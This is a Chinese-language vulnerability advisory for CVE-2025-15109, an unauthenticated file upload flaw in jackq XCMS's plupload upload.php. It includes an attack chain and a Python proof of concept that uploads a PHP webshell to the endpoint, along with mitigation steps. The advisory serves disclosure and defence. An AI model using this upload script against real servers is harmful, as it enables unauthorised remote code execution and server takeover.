CVE-2025-15109: jackq XCMS plupload文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-15109

漏洞类型

无限制文件上传

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

jackq XCMS

漏洞概述

CVE-2025-15109是jackq XCMS项目中的一个高危安全漏洞，存在于plupload文件上传组件中。该漏洞允许攻击者在无需认证的情况下，通过利用Public/javascripts/admin/plupload-2.1.2/examples/upload.php文件中的文件上传功能，上传任意类型的恶意文件到服务器。由于缺乏适当的文件类型验证和内容检查，攻击者可以上传webshell或其他恶意脚本，从而实现远程代码执行（RCE），完全控制受影响的服务器。此漏洞影响jackq XCMS项目在commit 3fab5342cc509945a7ce1b8ec39d19f701b89261之前的所有版本。CVSS评分为7.3，属于高危级别，攻击复杂度低，无需特殊权限或用户交互即可利用。建议用户立即采取防御措施，避免服务器被攻击者入侵。

技术细节

该漏洞存在于jackq XCMS项目中使用的plupload 2.1.2文件上传组件的upload.php端点。问题根源在于服务器端缺乏充分的文件上传验证机制。具体问题包括：1) 仅依赖客户端MIME类型检查，未进行服务器端验证；2) 缺少文件扩展名白名单控制；3) 未对上传文件内容进行安全扫描（如检查文件头、文件内容特征）；4) 上传目录可执行，允许上传的恶意脚本直接运行。攻击者可以通过构造恶意请求，上传.php、.phtml、.asp等可执行脚本文件到服务器。由于plupload组件的配置问题，服务器允许脚本文件上传并存储在web可访问目录下，攻击者随后可通过HTTP请求访问并执行这些恶意脚本，获得服务器命令执行权限。漏洞影响范围涵盖所有使用受影响plupload版本的项目。

攻击链分析

STEP 1

步骤1

攻击者发现目标网站使用存在漏洞的jackq XCMS系统，访问Public/javascripts/admin/plupload-2.1.2/examples/upload.php端点

STEP 2

步骤2

攻击者构造恶意文件上传请求，绕过客户端文件类型检查，上传包含恶意代码的.php或其他可执行脚本文件

STEP 3

步骤3

服务器端未进行充分的文件类型和内容验证，恶意文件被成功上传并存储在web可访问目录下

STEP 4

步骤4

攻击者通过HTTP请求访问上传的恶意脚本文件，触发执行以获取服务器命令执行权限

STEP 5

步骤5

攻击者利用获得的服务器权限进行横向移动、数据窃取或部署后门等进一步攻击活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15109 PoC - jackq XCMS Unrestricted File Upload
# Target: jackq XCMS with plupload <= 2.1.2

def upload_webshell(target_url, webshell_path):
    """
    Upload malicious webshell to vulnerable XCMS server
    """
    upload_url = f"{target_url}/Public/javascripts/admin/plupload-2.1.2/examples/upload.php"
    
    # Read webshell content
    with open(webshell_path, 'rb') as f:
        webshell_content = f.read()
    
    # Prepare multipart form data
    files = {
        'file': ('shell.php', webshell_content, 'application/x-php')
    }
    
    try:
        print(f"[*] Attempting to upload webshell to: {upload_url}")
        response = requests.post(upload_url, files=files, timeout=10)
        
        if response.status_code == 200:
            print("[+] File upload successful!")
            print(f"[+] Response: {response.text}")
            
            # Extract uploaded file path if available
            if 'path' in response.text or 'url' in response.text:
                print("[+] Access the webshell at the returned path")
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <webshell_path>")
        print(f"Example: python {sys.argv[0]} http://target.com /tmp/shell.php")
        sys.exit(1)
    
    target = sys.argv[1]
    shell = sys.argv[2]
    upload_webshell(target, shell)

影响范围

jackq XCMS <= 3fab5342cc509945a7ce1b8ec39d19f701b89261

plupload <= 2.1.2

防御指南

临时缓解措施

在官方修复版本发布前，建议立即采取以下临时缓解措施：1) 在Web服务器配置中禁止上传目录的脚本执行权限；2) 使用nginx或Apache的location规则阻止.php、.phtml等文件被访问和执行；3) 临时禁用文件上传功能直到漏洞修复；4) 在应用层添加临时文件类型检查和上传限制；5) 部署WAF规则拦截可疑的文件上传请求；6) 加强对服务器目录的监控，及时发现异常文件上传行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15109
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15109
3 Details https://www.cvedetails.com/cve/CVE-2025-15109/
4 VulDB https://vuldb.com/cve/CVE-2025-15109
5 Link https://gitee.com/jackq/XCMS/
6 Link https://gitee.com/jackq/XCMS/issues/IDC4ZT
7 Link https://vuldb.com/?ctiid.338480
8 Link https://vuldb.com/?id.338480
9 Link https://vuldb.com/?submit.711696